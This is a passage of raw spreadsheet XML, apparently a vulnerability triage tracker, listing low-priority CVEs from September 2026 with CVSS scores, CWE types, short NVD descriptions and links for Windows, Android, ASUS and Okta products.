s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1218" s="5" t="inlineStr" /><c r="H1218" s="5" t="n"><v>0.008</v></c><c r="I1218" s="5" t="inlineStr" /><c r="J1218" s="5" t="inlineStr" /><c r="K1218" s="5" t="inlineStr" /><c r="L1218" s="5" t="inlineStr" /><c r="M1218" s="5" t="inlineStr" /><c r="N1218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1218" s="5" t="inlineStr" /><c r="R1218" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1218" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Management Instrumentation allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69349</t></is></c></row><row r="1219"><c r="A1219" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1219" s="5" t="inlineStr"><is><t>CVE-2026-69372</t></is></c><c r="D1219" s="5" t="n"><v>5.7</v></c><c r="E1219" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1219" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1219" s="5" t="inlineStr" /><c r="H1219" s="5" t="n"><v>0.008</v></c><c r="I1219" s="5" t="inlineStr" /><c r="J1219" s="5" t="inlineStr" /><c r="K1219" s="5" t="inlineStr" /><c r="L1219" s="5" t="inlineStr" /><c r="M1219" s="5" t="inlineStr" /><c r="N1219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1219" s="5" t="inlineStr" /><c r="R1219" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1219" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Network File System allows an authorized attacker to deny service over a network.</t></is></c><c r="T1219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69372</t></is></c></row><row r="1220"><c r="A1220" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1220" s="5" t="inlineStr"><is><t>CVE-2026-69393</t></is></c><c r="D1220" s="5" t="n"><v>5.7</v></c><c r="E1220" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1220" s="5" t="inlineStr" /><c r="H1220" s="5" t="n"><v>0.008</v></c><c r="I1220" s="5" t="inlineStr" /><c r="J1220" s="5" t="inlineStr" /><c r="K1220" s="5" t="inlineStr" /><c r="L1220" s="5" t="inlineStr" /><c r="M1220" s="5" t="inlineStr" /><c r="N1220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1220" s="5" t="inlineStr" /><c r="R1220" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1220" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69393</t></is></c></row><row r="1221"><c r="A1221" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1221" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1221" s="5" t="inlineStr"><is><t>CVE-2026-69405</t></is></c><c r="D1221" s="5" t="n"><v>5.7</v></c><c r="E1221" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1221" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1221" s="5" t="inlineStr" /><c r="H1221" s="5" t="n"><v>0.006</v></c><c r="I1221" s="5" t="inlineStr" /><c r="J1221" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1221" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1221" s="5" t="inlineStr" /><c r="M1221" s="5" t="inlineStr" /><c r="N1221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1221" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1221" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1221" s="5" t="inlineStr" /><c r="R1221" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1221" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t></is></c></row><row r="1222"><c r="A1222" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1222" s="5" t="inlineStr"><is><t>CVE-2026-69416</t></is></c><c r="D1222" s="5" t="n"><v>5.7</v></c><c r="E1222" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1222" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1222" s="5" t="inlineStr" /><c r="H1222" s="5" t="n"><v>0.006</v></c><c r="I1222" s="5" t="inlineStr" /><c r="J1222" s="5" t="inlineStr" /><c r="K1222" s="5" t="inlineStr" /><c r="L1222" s="5" t="inlineStr" /><c r="M1222" s="5" t="inlineStr" /><c r="N1222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1222" s="5" t="inlineStr" /><c r="R1222" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1222" s="5" t="inlineStr"><is><t>Buffer over-read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69416</t></is></c></row><row r="1223"><c r="A1223" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1223" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1223" s="5" t="inlineStr"><is><t>CVE-2026-69507</t></is></c><c r="D1223" s="5" t="n"><v>5.7</v></c><c r="E1223" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1223" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1223" s="5" t="inlineStr" /><c r="H1223" s="5" t="n"><v>0.008</v></c><c r="I1223" s="5" t="inlineStr" /><c r="J1223" s="5" t="inlineStr" /><c r="K1223" s="5" t="inlineStr" /><c r="L1223" s="5" t="inlineStr" /><c r="M1223" s="5" t="inlineStr" /><c r="N1223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1223" s="5" t="inlineStr" /><c r="R1223" s="5" t="inlineStr"><is><t>CWE-538</t></is></c><c r="S1223" s="5" t="inlineStr"><is><t>Insertion of sensitive information into externally-accessible file or directory in Microsoft Windows Search Component allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69507</t></is></c></row><row r="1224"><c r="A1224" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1224" s="5" t="inlineStr"><is><t>CVE-2026-69552</t></is></c><c r="D1224" s="5" t="n"><v>5.7</v></c><c r="E1224" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1224" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1224" s="5" t="inlineStr" /><c r="H1224" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1224" s="5" t="inlineStr" /><c r="J1224" s="5" t="inlineStr" /><c r="K1224" s="5" t="inlineStr" /><c r="L1224" s="5" t="inlineStr" /><c r="M1224" s="5" t="inlineStr" /><c r="N1224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1224" s="5" t="inlineStr" /><c r="R1224" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1224" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Print Spooler Components allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69552</t></is></c></row><row r="1225"><c r="A1225" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1225" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1225" s="5" t="inlineStr"><is><t>CVE-2026-69569</t></is></c><c r="D1225" s="5" t="n"><v>5.7</v></c><c r="E1225" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1225" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1225" s="5" t="inlineStr" /><c r="H1225" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1225" s="5" t="inlineStr" /><c r="J1225" s="5" t="inlineStr" /><c r="K1225" s="5" t="inlineStr" /><c r="L1225" s="5" t="inlineStr" /><c r="M1225" s="5" t="inlineStr" /><c r="N1225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1225" s="5" t="inlineStr" /><c r="R1225" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1225" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Print Spooler Components allows an authorized attacker to deny service over a network.</t></is></c><c r="T1225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69569</t></is></c></row><row r="1226"><c r="A1226" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1226" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1226" s="5" t="inlineStr"><is><t>CVE-2026-69572</t></is></c><c r="D1226" s="5" t="n"><v>5.7</v></c><c r="E1226" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1226" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1226" s="5" t="inlineStr" /><c r="H1226" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1226" s="5" t="inlineStr" /><c r="J1226" s="5" t="inlineStr" /><c r="K1226" s="5" t="inlineStr" /><c r="L1226" s="5" t="inlineStr" /><c r="M1226" s="5" t="inlineStr" /><c r="N1226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1226" s="5" t="inlineStr" /><c r="R1226" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1226" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69572</t></is></c></row><row r="1227"><c r="A1227" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1227" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1227" s="5" t="inlineStr"><is><t>CVE-2026-69591</t></is></c><c r="D1227" s="5" t="n"><v>5.7</v></c><c r="E1227" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1227" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1227" s="5" t="inlineStr" /><c r="H1227" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1227" s="5" t="inlineStr" /><c r="J1227" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K122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227" s="5" t="inlineStr" /><c r="M1227" s="5" t="inlineStr" /><c r="N1227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1227" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1227" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1227" s="5" t="inlineStr" /><c r="R1227" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1227" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t></is></c></row><row r="1228"><c r="A1228" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1228" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1228" s="5" t="inlineStr"><is><t>CVE-2026-69637</t></is></c><c r="D1228" s="5" t="n"><v>5.7</v></c><c r="E1228" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1228" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1228" s="5" t="inlineStr" /><c r="H1228" s="5" t="n"><v>0.006</v></c><c r="I1228" s="5" t="inlineStr" /><c r="J1228" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1228" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1228" s="5" t="inlineStr" /><c r="M1228" s="5" t="inlineStr" /><c r="N1228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1228" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1228" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1228" s="5" t="inlineStr" /><c r="R1228" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1228" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t></is></c></row><row r="1229"><c r="A1229" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1229" s="5" t="inlineStr"><is><t>CVE-2026-69679</t></is></c><c r="D1229" s="5" t="n"><v>5.7</v></c><c r="E1229" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1229" s="5" t="inlineStr" /><c r="H1229" s="5" t="n"><v>0.006</v></c><c r="I1229" s="5" t="inlineStr" /><c r="J1229" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1229" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1229" s="5" t="inlineStr" /><c r="M1229" s="5" t="inlineStr" /><c r="N1229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1229" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1229" s="5" t="inlineStr" /><c r="R1229" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1229" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t></is></c></row><row r="1230"><c r="A1230" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1230" s="5" t="inlineStr"><is><t>CVE-2026-69723</t></is></c><c r="D1230" s="5" t="n"><v>5.7</v></c><c r="E1230" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1230" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1230" s="5" t="inlineStr" /><c r="H1230" s="5" t="n"><v>0.01</v></c><c r="I1230" s="5" t="inlineStr" /><c r="J1230" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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30" s="5" t="inlineStr" /><c r="M1230" s="5" t="inlineStr" /><c r="N1230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1230" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1230" s="5" t="inlineStr" /><c r="R1230" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1230" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t></is></c></row><row r="1231"><c r="A1231" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1231" s="5" t="inlineStr"><is><t>CVE-2026-75808</t></is></c><c r="D1231" s="5" t="n"><v>5.7</v></c><c r="E1231" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1231" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1231" s="5" t="inlineStr" /><c r="H1231" s="5" t="n"><v>0.001</v></c><c r="I1231" s="5" t="inlineStr" /><c r="J1231" s="5" t="inlineStr" /><c r="K1231" s="5" t="inlineStr" /><c r="L1231" s="5" t="inlineStr" /><c r="M1231" s="5" t="inlineStr" /><c r="N1231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1231" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1231" s="5" t="inlineStr" /><c r="R1231" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1231" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling in ASUS Armoury Crate allows a local user to cause a denial-of-service condition through system memory exhaustion by bypassing driver authentication and allocating an unrestricted amount of memory.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75808</t></is></c></row><row r="1232"><c r="A1232" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1232" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1232" s="5" t="inlineStr"><is><t>CVE-2026-75810</t></is></c><c r="D1232" s="5" t="n"><v>5.7</v></c><c r="E1232" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1232" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1232" s="5" t="inlineStr" /><c r="H1232" s="5" t="n"><v>0.001</v></c><c r="I1232" s="5" t="inlineStr" /><c r="J1232" s="5" t="inlineStr" /><c r="K1232" s="5" t="inlineStr" /><c r="L1232" s="5" t="inlineStr" /><c r="M1232" s="5" t="inlineStr" /><c r="N1232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1232" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1232" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1232" s="5" t="inlineStr" /><c r="R1232" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S1232" s="5" t="inlineStr"><is><t>Exposed Dangerous Method or Function in ASUS Armoury Crate allow a local user to cause a brief system stall by bypassing driver authentication and sending requests to trigger system management interrupts (SMIs). Repeatedly triggering SMI may lead to a denial-of-service (DoS) condition.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75810</t></is></c></row><row r="1233"><c r="A1233" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1233" s="5" t="inlineStr"><is><t>CVE-2026-78629</t></is></c><c r="D1233" s="5" t="n"><v>5.6</v></c><c r="E1233" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1233" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1233" s="5" t="inlineStr" /><c r="H1233" s="5" t="n"><v>0.001</v></c><c r="I1233" s="5" t="inlineStr" /><c r="J1233" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1233" s="5" t="inlineStr" /><c r="L1233" s="5" t="inlineStr" /><c r="M1233" s="5" t="inlineStr" /><c r="N1233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1233" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1233" s="5" t="inlineStr" /><c r="R1233" s="5" t="inlineStr"><is><t>CWE-303</t></is></c><c r="S1233" s="5" t="inlineStr"><is><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is></c><c r="T1233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t></is></c></row><row r="1234"><c r="A1234" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1234" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1234" s="5" t="inlineStr"><is><t>CVE-2026-28584</t></is></c><c r="D1234" s="5" t="n"><v>5.5</v></c><c r="E1234" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1234" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1234" s="5" t="inlineStr" /><c r="H1234" s="5" t="n"><v>0.001</v></c><c r="I1234" s="5" t="inlineStr" /><c r="J1234" s="5" t="inlineStr" /><c r="K1234" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1234" s="5" t="inlineStr" /><c r="M1234" s="5" t="inlineStr" /><c r="N1234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1234" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1234" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1234" s="5" t="inlineStr" /><c r="R1234" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1234" s="5" t="inlineStr"><is><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is></c><c r="T1234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28584</t></is></c></row><row r="1235"><c r="A1235" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1235" s="5" t="inlineStr"><is><t>CVE-2026-28596</t></is></c><c r="D1235" s="5" t="n"><v>5.5</v></c><c r="E1235" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1235" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1235" s="5" t="inlineStr" /><c r="H1235" s="5" t="n"><v>0.001</v></c><c r="I1235" s="5" t="inlineStr" /><c r="J1235" s="5" t="inlineStr" /><c r="K1235" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1235" s="5" t="inlineStr" /><c r="M1235" s="5" t="inlineStr" /><c r="N1235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1235" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1235" s="5" t="inlineStr" /><c r="R1235" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1235" s="5" t="inlineStr"><is><t>In parseInterventionFromXml of GameManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28596</t></is></c></row><row r="1236"><c r="A1236" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1236" s="5" t="inlineStr"><is><t>CVE-2026-28617</t></is></c><c r="D1236" s="5" t="n"><v>5.5</v></c><c r="E1236" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1236" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1236" s="5" t="inlineStr" /><c r="H1236" s="5" t="n"><v>0.001</v></c><c r="I1236" s="5" t="inlineStr" /><c r="J1236" s="5" t="inlineStr" /><c r="K1236" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1236" s="5" t="inlineStr" /><c r="M1236" s="5" t="inlineStr" /><c r="N1236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1236" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1236" s="5" t="inlineStr" /><c r="R1236" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1236" s="5" t="inlineStr"><is><t>In add of WifiNetworkSuggestionsManager.java, there is a possible persistent DOS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28617</t></is></c></row><row r="1237"><c r="A1237" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1237" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1237" s="5" t="inlineStr"><is><t>CVE-2026-28633</t></is></c><c r="D1237" s="5" t="n"><v>5.5</v></c><c r="E1237" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1237" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1237" s="5" t="inlineStr" /><c r="H1237" s="5" t="n"><v>0.001</v></c><c r="I1237" s="5" t="inlineStr" /><c r="J1237" s="5" t="inlineStr" /><c r="K1237" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1237" s="5" t="inlineStr" /><c r="M1237" s="5" t="inlineStr" /><c r="N1237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1237" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1237" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1237" s="5" t="inlineStr" /><c r="R1237" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1237" s="5" t="inlineStr"><is><t>In initForUserNoTracing of VoiceInteractionManagerService.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28633</t></is></c></row><row r="1238"><c r="A1238" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1238" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1238" s="5" t="inlineStr"><is><t>CVE-2026-49883</t></is></c><c r="D1238" s="5" t="n"><v>5.5</v></c><c r="E1238" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1238" s="5" t="inlineStr" /><c r="H1238" s="5" t="n"><v>0.001</v></c><c r="I1238" s="5" t="inlineStr" /><c r="J1238" s="5" t="inlineStr" /><c r="K1238" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1238" s="5" t="inlineStr" /><c r="M1238" s="5" t="inlineStr" /><c r="N1238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1238" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1238" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1238" s="5" t="inlineStr" /><c r="R1238" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S1238" s="5" t="inlineStr"><is><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is></c><c r="T1238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49883</t></is></c></row><row r="1239"><c r="A1239" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1239" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1239" s="5" t="inlineStr"><is><t>CVE-2026-54611</t></is></c><c r="D1239" s="5" t="n"><v>5.5</v></c><c r="E1239" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1239" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1239" s="5" t="inlineStr" /><c r="H1239" s="5" t="n"><v>0.005</v></c><c r="I1239" s="5" t="inlineStr" 